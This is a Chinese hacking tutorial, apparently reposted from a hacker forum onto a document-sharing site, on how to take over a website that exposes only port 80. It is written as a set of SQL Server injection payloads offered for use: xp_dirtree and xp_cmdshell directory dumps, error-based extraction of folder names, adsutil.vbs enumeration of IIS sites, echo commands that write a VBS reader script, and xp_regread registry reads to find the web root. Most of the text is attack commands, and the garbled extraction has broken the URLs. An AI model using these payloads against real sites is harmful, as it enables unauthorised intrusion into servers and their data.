《拿下只开了80端口网站的方法》由会员分享,可在线阅读,更多相关《拿下只开了80端口网站的方法(16页珍藏版)》请在金锄头文库上搜索。
1、拿下只开了拿下只开了 8080 端口网站的方法端口网站的方法第一种方法: 这个是中介绍的方法利用 sqlserver 的 xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充)建立表语句:http:/ table dirs(paths varchar(1000)-返回:正常的信息!说明建表成功!继续!(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用语句:http:/ dirs exec master.dbo.xp_dirtree c: -返回:正常信息。说明写入 C 盘的所有目录成功了!爽!接下来就是取表了!暴它出来。(好像只有
2、暴这种方法了)语句:http:/ and 0(select top 1 paths fromdirs where paths not in( Inetpub)-返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07将 varchar 值 test转换为数据类型为 int 的列时发生语法错误。再依次爆出表中的目录名称!好我们继续语句:http:/http:/ and 0(select top 1 paths from dirs)-时不是显示出错,而是网页显示正常晕了吧,别紧张哈看看 0(select top 1 paths from dir
3、s)返回正常哈哈,用这种大于小于的方法很快就能猜出了好我们继续比如当出现59=(select top 1 paths from dirs)返回正常,ok,说明名字是 59输入如下http:/http:/ and 0(select top 1 paths fromdirs where paths not in( 059)-发现显示下一个文件夹名字了,ok优缺点分析:优点就是所有的 sqlserver 用户都可以使用,因为 xp_dirtree适用权限 PUBLIC,缺点是显示的是目录下的所有文件夹的名字,而且排列好像是没有什么顺序的,总之在好几千好几万个文件夹里找你想要的文件夹是痛苦的.而且你知
4、道了有那个文件夹也不能保证在根目录下,实在是痛苦的一件事情呀,很多时候是靠运气和耐力.祝你成功方法二:利用 xp_cmdshell哈哈,这个大家一定很熟悉了吧,我就简单说一下建立表语句:http:/ table dirs(paths varchar(1000)-返回:正常的信息!说明建表成功!继续!(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用语句:http:/ dirs exec master.dbo.xp_cmdshell dir c: /B/D -返回:正常信息。说明写入 C 盘的所有目录成功了!这里用了dir c: /B/D,哈哈,不知道/B/D 什么作
5、用就试验试验看语句:http:/ and 0(select top 1 paths fromdirs where paths not in( Inetpub)-返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07将 varchar 值 test转换为数据类型为 int 的列时发生语法错误。再依次爆出表中的目录名称!方法同上,就不说了有时候我们也可以用下面的两个扩展来干些事情1)我们可以利用 xp_availablemedia 来获得当前所有驱动器,并存入 dirs 表中:5 ;insert dirs exec master.dbo.xp
6、_availablemedia;-我们可以通过查询 temp 的内容来获得驱动器列表及相关信息(2)我们可以利用 xp_subdirs 获得子目录列表,并存入 dirs 表中:5 ;insert into dirs exec master.dbo.xp_subdirs c: ;-优缺点分析:很明显了,这样就不会出现 xp_dirtree 那种所有目录都放在一起的情况了,只会显示一级目录,找起来方便多了.缺点也很明显,只有 sa 有这个权限,也有可能管理员删除了这个扩展(毕竟太强大了).方法三:这种方法很好下面这个是原文想到了使用 adsutil.vbs 程序,我是这样执行的a;exec mas
7、ter.xp_cmdshell cmd /c cscript c:inetpubadminscripsadsutil.vbs enum w3svc/1/roota.txt;-是不是很长啦通过它我们可以把 iis 里面第一个虚拟 web 站点的设置情况(当然包括它所在的实际目录咯),导入到 a.txt 中对于 a.txt 的实际位置默认当然是c:winntsystem32,其实这都不是问题,不过遇到管理员把adsutil.vbs,删了或是放到别的地方我们就没办法了(不可能自已用 echo 命令写一个吧)第二步:用 echo 命令写下面的代码到 c:中,很多吗也不算吧.xp_cmdshell ec
8、ho set fso1=createobject(“scripting.filesystemobject“)c:read.vbs;- .xp_cmdshell echo Set WshShell = Wscript.createObject(“Wscript.Shell“)c:read.vbs ;- . -read.vbs- set fso1=createobject(“scripting.filesystemobject“) Set WshShell = Wscript.createObject(“Wscript.Shell“) spa=WshShell.Environment(“proce
9、ss“)(“windir“) set fil =fso1.opentextfile(spa exec master.xp_cmdshell cmd /c cscript c:inetpubadminscripsadsutil.vbs enum w3svc/2/roota.txt;-但是这种方法只能在 windows2000 下使用,因为 2003 下新建的网站所在地址不是按照 1234 来排列的,好像是随机生成的,个人比较过几个 2003 下的地址,没有发现什么规律.优缺点分析同上 xp_cmdshell 不是每一个用户都可以用的!还有一个问题是adsutil 文件不一定存在,或者不一定在那个
10、路径上,当然如果你原意的话你可以用echo 写一个(哈哈,老多老多行的哟),另外的一个问题是,如果主机上有很多站点怎么办?我遇到过一个有九个站点的主机,胆识只有第 8 个是有用的,晕了吧,很难有人有嗯那个耐性会坚持到那么多的,早就崩溃了或许.还有就是不能在 2003 下用!不过说实话,这个方法的确是一个好方法方法四:这个方法是要饭的提到的,通过 xp_regread 等从注册表里读出路径以下推荐,获取网页路径(通过存储过程达到对注册表的读取):利用内置存储过程 xp_regread(读取注册表键值,权限 public):语句:http:/ TABLE newtable(id int IDENT
11、ITY(1,1),paths varchar(500) Declare testvarchar(20) exec master.xp_regread rootkey= HKEY_LOCAL_MACHINE , key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots , value_name= / , values=test OUTPUT insert into paths(path) values(test)IIS 的默认路径的在注册表中 HKEY_LOCAL_MACHINE SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots利用爆字段将数据库的值读出来:语句:http:/ and 0(select top 1 paths from dirs where id=1)-只要加上 id=1,就是第一级目录 。本文转自: 黑客武林() 详细出处参考:http:/
